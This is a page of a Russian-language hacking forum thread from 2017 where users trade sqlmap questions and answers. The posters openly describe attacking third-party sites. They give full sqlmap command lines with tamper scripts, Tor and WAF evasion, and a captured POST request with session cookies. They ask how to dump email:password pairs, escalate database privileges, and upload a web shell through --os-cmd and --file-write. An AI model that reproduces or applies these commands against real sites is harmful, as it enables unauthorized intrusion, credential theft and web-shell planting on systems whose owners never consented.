HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 50 из 115 « Первая < 40 46 47 48 49 50 51 52 53 54 60100 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #491  
Старый 27.08.2017, 01:24
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию
Исследую сайтик с уязвимостью, но юзер базы не dba, а как поднять права, чтобы можно было загрузить шел, слить файлы с сервака ? Нужно os-shell или метасплойт сессию открывать и прописывать права юзеру базы через консоль винды ( сервер на вин2003 компе).
 
Ответить с цитированием

  #492  
Старый 27.08.2017, 16:25
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию
Еще заметил sqlmap иногда неверно определяет имена баз, вот такое мне выдал mas\x81er имя базы, как я понял ошибся в символе, нужно его повторно запросить сделать, но вот как сделать, чтобы он начал заново, не удаляя файлик базы слитой ?
 
Ответить с цитированием

  #493  
Старый 28.08.2017, 13:29
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от roman921  
roman921 said:

Еще заметил sqlmap иногда неверно определяет имена баз, вот такое мне выдал mas\x81er имя базы, как я понял ошибся в символе, нужно его повторно запросить сделать, но вот как сделать, чтобы он начал заново, не удаляя файлик базы слитой ?
--fresh-queries
 
Ответить с цитированием

  #494  
Старый 28.08.2017, 18:45
dR0ny
Guest
Сообщений: n/a
Провел на форуме:
709

Репутация: 0
По умолчанию
Доброго денечка всем.

Кручу один сайтец уже хз сколько времени, это пздц какой-то. В общем Бурп нашел такой алярм :

.SpoilerTarget" type="button">Spoiler
POST /signin.html HTTP/1.1

Host: site

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Referer: http://site.com/signin.html

Content-Type: application/x-www-form-urlencoded

Content-Length: 77

Cookie: LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18

referer=http%3a%2f%2fwww.site.com%2fsitemap.html&m emberName=&memberPassWord=

Правильно ли я прописываюсь в sqlmap?

.SpoilerTarget" type="button">Spoiler
-u "http://site.com/signin.html" -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10 --cookie="LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18" --data "referer=http%3a%2f%2fwww.site.com%2fsitemap.html& memberName=&memberPassWord="

Ребят как раскрутить? Также срабатывает WAF...
 
Ответить с цитированием

  #495  
Старый 29.08.2017, 14:35
roman921
Guest
Сообщений: n/a
Провел на форуме:
68152

Репутация: 0
По умолчанию
Цитата:
Сообщение от cat1vo  
cat1vo said:

--fresh-queries
С этой опцией он начинает обновлять все записи. Как конкретную запись заставить его проверить на ошибки ?
 
Ответить с цитированием

  #496  
Старый 29.08.2017, 21:52
dR0ny
Guest
Сообщений: n/a
Провел на форуме:
709

Репутация: 0
По умолчанию
Ребят, помогите, скулю нашел, имя БД выводит, но не могу получить Имена таблиц, соответственно и колонок, дабы дампнуть емейл:пасс

Скрин



Что пишу в Мапе:

.SpoilerTarget" type="button">Spoiler
-u "http://www.site:80/news/news.html?date=2016-09" --level=3 --risk=3 --random-agent --tor -D (DBS) --tables --no-cast -v 3 --identify-waf --tamper="between,randomcase,space2comment" --threads=10
 
Ответить с цитированием

  #497  
Старый 07.09.2017, 22:01
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию
Цитата:
Сообщение от dR0ny  
dR0ny said:

Ребят, помогите, скулю нашел, имя БД выводит, но не могу получить Имена таблиц, соответственно и колонок, дабы дампнуть емейл:пасс
Скрин

Что пишу в Мапе:
Spoiler
-u "
http://www.site:80/news/news.html?date=2016-09
" --level=3 --risk=3 --random-agent --tor -D (DBS) --tables --no-cast -v 3 --identify-waf --tamper="between,randomcase,space2comment" --threads=10
Скорей всего блокируется Select хз меня такая же проблема была,не нашел какой темпер юзать,если кто поможет буду благодарен
 
Ответить с цитированием

  #498  
Старый 08.09.2017, 14:02
MrBa
Guest
Сообщений: n/a
Провел на форуме:
3505

Репутация: 0
По умолчанию
Пытаюсь залить шелл. ls-dbs:true

Вот запрос - sqlmap -u "http://xxxxxx.com/product/shopview.php?shop=51479" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1

путь есть, указываю -

please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main

но он обращается сюда и подставляет из запроса product/shopview.php/ -

[WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'

как избавиться от этого? Ведь указываю путь куда именно залить файл
 
Ответить с цитированием

  #499  
Старый 08.09.2017, 14:34
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от MrBa  
MrBa said:

Пытаюсь залить шелл. ls-dbs:true
Вот запрос - sqlmap -u "
http://xxxxxx.com/product/shopview.php?shop=51479
" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1
путь есть, указываю -
please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main
но он обращается сюда и подставляет из запроса product/shopview.php/ -
[WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'
как избавиться от этого? Ведь указываю путь куда именно залить файл
Код:
Code:
--file-write=WFILE  Write a local file on the back-end DBMS file system  --- локальный путь до файла
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to  --- куда лить на удаленном хосте
а вообще чего руками то не залить
 
Ответить с цитированием

  #500  
Старый 08.09.2017, 15:03
MrBa
Guest
Сообщений: n/a
Провел на форуме:
3505

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

Ведь указываю путь куда именно залить файл - Точно ?
точно

Цитата:
Сообщение от BabaDook  
BabaDook said:

--dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1 Вообще с такой командой мог бы и не спрашивать я . Изучай мануал
Спасибо за развернутый ответ. Изучал мануал. Вы наверное родились с этими знаниями. Горжусь вами. Просто задал вопрос
 
Ответить с цитированием
Ответ
Страница 50 из 115 « Первая < 40 46 47 48 49 50 51 52 53 54 60100 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ